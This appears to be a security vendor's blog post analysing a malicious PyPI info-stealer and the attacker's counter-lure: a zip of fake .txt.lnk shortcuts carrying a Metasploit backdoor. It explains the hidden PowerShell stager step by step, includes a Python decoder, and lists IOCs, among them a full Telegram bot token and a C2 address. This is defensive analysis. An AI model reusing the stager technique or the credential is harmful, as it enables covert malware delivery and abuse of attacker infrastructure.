A cybersecurity researcher, delving into the depths of a malicious Python package, suddenly finds themselves in the crosshairs of the very hacker they have been monitoring. What begins as a pursuit of understanding dangerous code evolves into a strategic battle of wits, where each move could either outsmart the attacker or fall into their trap.
Introduction
Targeting the open-source space of the software industry is trending among threat actors, not only because it represents one of the largest attack surfaces, but because it often escapes the vigilant eyes of organizations.
Open-source package managers are especially attractive to Advanced Persistent Threats (APTs) and other malicious entities, who often poison them with malicious packages and employ methods ranging from manipulating build automation processes to skillfully deceiving developers into installing these compromised packages.
The ramifications of such breaches are far-reaching and can have devastating consequences for any organization, regardless of its size. Therefore, it is essential to thoroughly vet every component or dependency in the supply chain.
Our research team recognizes the seriousness of these threats. To safeguard the open-source software ecosystem, we monitor popular public repositories like NPM and PyPi, to name just a few, to identify and remove any rogue packages or dependencies at the earliest stage.
This story, however, takes an unexpected twist, when one of our researchers, while analyzing a malicious Python package named “testfiwldsd21233s” from the PyPi repository, found themselves in the crosshairs of the very threat actor they were investigating. What unfolded was not just an analysis of a cybersecurity breach, but a gripping story of how the hunter became the hunted.
But before we delve deep into the analysis of this incident, let's take a step back to understand the background of the malicious package the researcher had been analyzing.
Behavioral Analysis of the Malicious Package
In its entirety, the package is capable of targeting both Windows and Linux-based systems. If it detects that it is on a Windows NT host, it deploys a malicious executable. If it is on a Linux-based host, it instead leverages native Python code. In essence, it functioned as data-stealing malware, systematically gathering sensitive information from web browsers, including but not limited to cookies and saved passwords, and saved this data into temporary files, which were then uploaded to transfer[.]sh. Finally, it would exfiltrate the host information, along with a unique URL to download the stolen data from transfer[.]sh, using a hardcoded Telegram bot API URL. Additionally, it would create a scheduled task on the system to maintain persistence.
Driven by curiosity, the researcher wanted to examine the exfiltrated data and analyze it. The objective was to assess the scope of the malware's impact, identify and locate potential victims, and explore the possibility of tracing the threat actor behind it.
A Game of Cyber Cat & Mouse: The Researcher's Countermove
By employing a technique that allows the forwarding of all exfiltrated data through the Telegram bot API to the researcher's personal Telegram chat, the researcher effectively managed to redirect all the stolen data from the threat actor's chat to their own chat.
Forwarding of data from the threat actor's Telegram chat to the researcher's own chat
The data forwarded by the bot included various host information, geo-location, and the link to download an encrypted file with a “.wsr” extension, which contains all the stolen cookies and passwords. Unfortunately, the files could not be decrypted for further analysis, and that is where we stopped our investigation.
The Attacker Attempts To Strike Back
However, after roughly a month, the researcher received a new notification about a new stolen record in the chat from the same Telegram bot.
This raised suspicion because, unlike the earlier data, there was no “forwarded” tag attached to the new chat. And instead of an encrypted file with a “.wsr” extension, there was an unencrypted zip archive.
Suspicious message received in Telegram chat
Upon downloading and decompressing the zip archive attached to the chat for further analysis, the following observations were made:
The unarchived data contained multiple files with the “.lnk” extension, which in all cases except one were also preceded by a second extension in the filename, “.txt”.
The presence of these double extensions raised suspicion, particularly the “.lnk” extension, as LNK files are shortcut files in the Windows OS that can execute malicious code if clicked.
The list of files with the “.lnk” extension, preceded by the “.txt” extension
Peeling Back Layers: Exposing a Backdoor Operation
Upon analyzing these shortcut files using the “exiftool” command on a Linux machine, we discovered several important details.
First, the “Icon File Name” property was set to the path “%windir%\system32\notepad.exe”, which caused the shortcut files to display the Notepad icon. Using the “.txt” extension in the filename now makes sense: Windows Explorer hides the real “.lnk” extension by default, and combined with the custom icon set for these files, they appear to be normal, benign text files.
The second thing we learned was that the “Command Line Arguments” property was set to the following PowerShell command:
Another thing to note is that all the shortcut files in the unarchived data, except for “Screen,jpg.lnk”, had the exact same SHA-256 hash. They are, therefore, all the same malicious file. If any one of these files is opened, the malicious PowerShell command defined in the “Command Line Arguments” property will be executed.
Here is a breakdown of the PowerShell command and its execution (the command is launched via cmd.exe, hence the “^|” and “^&” escapes):
- “/c powershell -windowstyle hidden”: The entire command will be executed in a hidden window and will not be visible to the victim.
- “$lnkpath = Get-ChildItem *.lnk ^| where-object {$_.length -eq 0x00117926} ^| Select-Object -ExpandProperty Name;”: Searches for a shortcut file (.lnk) in the current directory with a file size of 0x00117926 (in hex). This matches any of the malicious shortcut files except “Screen,jpg.lnk”, as they satisfy the file size criterion.
- “$file = gc $lnkpath -Encoding Byte”: The content of the matching file is then read and stored as a byte array in the variable “$file”.
- “for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x33 };”: Iterates over every byte stored in the byte array “$file”, applying a bitwise XOR with the value 0x33 to each byte.
- “$path="%temp%\tmp" + (Get-Random) + '.exe';”: Builds the path of a new executable file in the temporary directory, with a random name and “.exe” as its extension.
- “sc $path ([byte []] ($file ^| select -Skip 002838)) -Encoding Byte;”: Writes the XOR-ed byte array, after skipping its first 2838 bytes, to the new “.exe” file.
- “^& $path;”: Finally, runs the newly created executable.
We then used a simple Python script, as shown in the photo below, to extract the malicious executable from the “LNK” file. Furthermore, the “file” command confirms that the extracted file is a 64-bit PE file for MS Windows, written in .NET framework, with the SHA-256 hash “4cf48c2a3933ac4c6733533bf16d40fa4e411fbbf42b03d84d6c8df62e253ad0”.
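The script from the photo is not reproduced on this page. As an added example (not the researchers' script), the following Python reimplements the stager's transform from the breakdown above (XOR each byte with 0x33, drop the first 2838 bytes) and only writes the result out if it carries a valid MZ/PE header, so a shortcut without an embedded payload, like the one odd-sized file in the archive, is reported rather than turned into junk. The test payload and the LNK-like carrier are constructed in the block; the 0x00117926 size is the filter the stager itself uses.

```python
import struct
import sys

XOR_KEY = 0x33            # single-byte key from the stager's "-bxor 0x33"
PAYLOAD_OFFSET = 2838     # prefix dropped by "select -Skip 002838"
LURE_SIZE = 0x00117926    # size the stager uses to pick its own .lnk file


def decode_payload(lnk_bytes: bytes) -> bytes:
    """Apply the stager's transform: XOR every byte, then drop the LNK prefix."""
    return bytes(b ^ XOR_KEY for b in lnk_bytes)[PAYLOAD_OFFSET:]


def looks_like_pe(data: bytes) -> bool:
    """Accept only data with an MZ stub whose e_lfanew points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def extract_from_lnk(lnk_bytes: bytes):
    """Return the embedded PE, or None when the shortcut carries no payload."""
    payload = decode_payload(lnk_bytes)
    return payload if looks_like_pe(payload) else None


def build_fake_pe() -> bytes:
    """Constructed stand-in for a PE: MZ header, e_lfanew -> 0x40, 'PE\\0\\0', padding."""
    dos_header = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", dos_header, 0x3C, 0x40)
    return bytes(dos_header) + b"PE\x00\x00" + b"\x00" * 16


def build_fake_lnk(payload: bytes) -> bytes:
    """Constructed LNK-like carrier: 2838 filler bytes, then the XOR-encoded payload."""
    return b"\x4c" + b"\x00" * (PAYLOAD_OFFSET - 1) + bytes(b ^ XOR_KEY for b in payload)


if __name__ == "__main__":
    for path in sys.argv[1:]:
        blob = open(path, "rb").read()
        size_note = "size matches stager filter" if len(blob) == LURE_SIZE else "size differs"
        pe = extract_from_lnk(blob)
        if pe is None:
            print(f"{path}: {size_note}; no embedded PE found")
            continue
        out = path + ".extracted.bin"
        open(out, "wb").write(pe)
        print(f"{path}: {size_note}; wrote {len(pe)} bytes to {out}")
```

Run it against the shortcuts from the archive on an isolated analysis host; the extracted `.bin` can then be hashed and compared with the SHA-256 listed in the IOC section.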
When it comes to the malicious executable, one option is to statically analyze it by decompiling it with a .NET decompiler like ILSpy or dnSpy. However, in this particular case, we opted for dynamic analysis, as it proved to be more efficient. Through this analysis, we made the following observations:
This malicious executable has been identified as a backdoor created using the Metasploit framework. It communicates with a handler at the IP address “128[.]199[.]113[.]162”. The full URL the backdoor uses, accepting both GET and POST requests, is “hxxp[://]128[.]199[.]113[.]162/upwawsfrg[.]php”. This endpoint can be used for exfiltrating data as well as fetching additional payloads for post-exploitation purposes.
Furthermore, the processes invoked by the executable indicate that it also uses the Windows Task Scheduler to create a scheduled task on the compromised host. This task runs the executable itself every 5 minutes, serving as a persistence mechanism that allows the threat actor to maintain consistent remote access even after reboots.
Conclusion
From the above incident, it is clear that this was a carefully crafted attack, tailored with meticulous attention to detail. The threat actor behind it demonstrated a clear understanding of the context and situation. Using fake exfil data was a formidable tactic, as it could have deceived the researcher into making a misstep resulting in a complete compromise.
In light of this, people working in the cybersecurity industry need to be more vigilant. Attacks are becoming increasingly sophisticated every day, and they are not limited to the average internet user.
As part of the Checkmarx Supply Chain Security solution, our research team constantly monitors suspicious activity in the open-source software ecosystem. We track and flag “signals” that may indicate foul play and promptly alert our customers to help protect them.
IOC
- hxxps[://]api[.]telegram[.]org/bot6021370805:AAFbCSlFairNgnxSj8mC6Wtf7PW5yGyWmcE
- 128[.]199[.]113[.]162
- hxxp[://]128[.]199[.]113[.]162/upwawsfrg[.]php
- SHA-256 hash of LNK files – 273a75ba90251e317ed6291e6d4e31f80ce006e81bdc6582a4988078dc5610ef
- SHA-256 hash of malicious executable – 4cf48c2a3933ac4c6733533bf16d40fa4e411fbbf42b03d84d6c8df62e253ad0